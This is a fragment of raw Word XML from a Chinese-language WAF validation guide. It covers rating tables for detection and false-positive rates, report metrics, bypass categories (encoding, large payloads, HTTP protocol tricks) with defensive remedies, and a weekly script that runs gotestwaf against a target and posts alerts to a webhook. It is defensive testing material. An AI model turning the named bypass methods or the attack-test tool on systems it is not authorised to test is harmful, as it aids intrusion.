          </w:tcPr>
          <w:p w14:paraId="28B3EA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≥85%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="3345FF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≥70%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="639D59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≥50%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="72AA8B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&lt;50%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="286CF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4C0B739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XXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="50058C4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≥98%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="31A518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≥90%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="01B5BB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≥80%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6D6B99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≥60%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7DC93D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&lt;60%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="102277B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78253394">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C0B523F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5.2.2 误报率评估</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D8A7CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑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816"/>
        <w:gridCol w:w="2216"/>
      </w:tblGrid>
      <w:tr w14:paraId="68E5E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216E37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误报率</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="704529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等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="58532D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说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6B36E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080270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&lt;1%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="319126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优秀</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="466C6F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几乎无误报</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3CCE9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5902584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1-3%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="11CB2A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良好</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="405417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偶有误报，可接受</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1E102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393B36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3-5%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4B765DB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中等</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="084D57D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存在误报，需要优化</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2E7DE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3A6D54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5-10%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="5024C9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及格</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="7A0F6C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误报较多，影响业务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="51282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742AE8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&gt;10%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="213373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不及格</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="63BA70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误报严重，需重新配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B5299FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A9C8BCC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D93ACD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5.3 测试报告评估要点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6948B721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F9260E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评估报告应包含以下关键指标：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB4576F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑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416"/>
        <w:gridCol w:w="3621"/>
      </w:tblGrid>
      <w:tr w14:paraId="44D55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559629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指标</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="115879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说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="377039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计算方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3297C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717AE1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总请求数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6AB56C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发送的全部测试请求</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="12969C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</w:tr>
      <w:tr w14:paraId="76DC2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78F00E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拦截率</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="4F157E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正确拦截恶意请求的比例</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="36726D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已拦截 / (已拦截 + 已绕过)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5AC1E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1657E6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绕过率</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="566551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未能拦截恶意请求的比例</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="17A8A0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已绕过 / (已拦截 + 已绕过)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="671F2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1E694C4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误报率</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="2FCD3D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错误拦截正常请求的比例</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="76EC44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已拦截 / (已通过 + 已拦截)（真负例）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3F1A9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16CF00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未确定率</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7DC589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无法判断结果的比例</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0F83A3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未确定 / 总请求</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FCFDD3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D082E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442644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39C68748">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E61B56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六、典型问题与解决方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227B0285">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CDD40C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常见绕过问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E817C71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6324D4C7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6.1.1 编码绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66848942">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="379B473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问题表现：WAF 无法识别编码后的攻击载荷</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597019F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D4A85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解决方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450EA8D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启用 WAF 的解码功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDA9B7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增加多重解码检测规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE857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配置解码深度限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22785FC2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78BD973E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6.1.2 大载荷绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A47A8E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C9CF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问题表现：超大请求体绕过 WAF 检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FC0ED7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ADBC2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解决方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DB1D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增加 WAF 检测缓冲区大小</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C309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配置请求体大小限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0067334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启用分块传输编码检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA821BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B7F2CF6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6.1.3 协议层绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1F13D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DAE566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问题表现：利用 HTTP 协议特性绕过检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5F2261">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53680D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解决方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420414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启用 HTTP 协议严格模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38578C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配置请求走私防护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBDB5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增加协议异常检测规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202C4F6D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FDEA87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 常见误报问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549B97C6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DFB1EC5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6.2.1 正常业务误报</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65525EAE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C1CD24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问题表现：正常业务请求被 WAF 拦截</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B56FC31">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D963D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解决方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1E31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分析误报请求特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7DBC4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添加白名单规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1295469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调整规则敏感度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AD6EA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使用异常评分模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751391E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="712F6921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6.2.2 API 接口误报</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F0F59A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B5EEA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问题表现：API 接口正常请求被拦截</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E10A98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02C051C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解决方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CC227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 OpenAPI 规范配置白名单</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B1B5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针对 API 路径配置例外规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012BF6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调整 Content-Type 检测规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EA3844">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C24907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4FF957F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435C653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七、持续改进机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC7119B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04AF114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7.1 定期验证计划</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DFAF50">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑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1216"/>
        <w:gridCol w:w="2021"/>
      </w:tblGrid>
      <w:tr w14:paraId="25DE7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2F1B71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验证类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="1156C5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频率</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="6E048E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范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="04B15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0D1E3B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快速验证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0CA84A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每周</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1F7BF8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OWASP 核心测试集</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3A2FD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343BC1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标准验证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="021342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每月</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="71A75F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全部测试集</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="78C06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274245C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全面验证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7D896F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每季度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="36B243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含自定义测试用例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6275E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1B924D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专项验证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="52CA11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配置变更后</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="5FD569E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变更相关测试集</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72EEECB1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A963920">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6638ED8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7.2 自动化验证流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726C6D00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C019E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#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550EC0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weekly-waf-test.sh - 每周 WAF 验证脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434E4311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC8008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DATE=$(date +%Y%m%d)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE53A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REPORT_DIR="/data/waf-reports/$DATE"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098BF5B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mkdir -p $REPORT_DIR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D589FC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A2B12B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执行测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081923E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gotestwaf \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5465E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--url=$WAF_TARGET_URL \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA5A6A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--testSet=owasp \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6824514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--reportFormat=json \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF389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--reportName=$REPORT_DIR/weekly-test \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C1D4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--noEmailReport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AD1245">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A77CE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解析结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D521C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SCORE=$(cat $REPORT_DIR/weekly-test.json | jq '.score.average')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C076C4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FFF59D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判断是否达标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753BCD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if (( $(echo "$SCORE &lt; 80" | bc) )); then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E09407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echo "警告：WAF 评分低于 80%，当前评分：$SCORE"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C33C1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# 发送告警通知</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571E7DA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curl -X POST $WEBHOOK_URL -d "WAF评分告警：当前评分 $SCORE%"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FE9B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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EA5656">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A64F38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415BD6E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7.3 基线管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77610CD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E574A6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建立 WAF 安全基线档案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E18D036">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
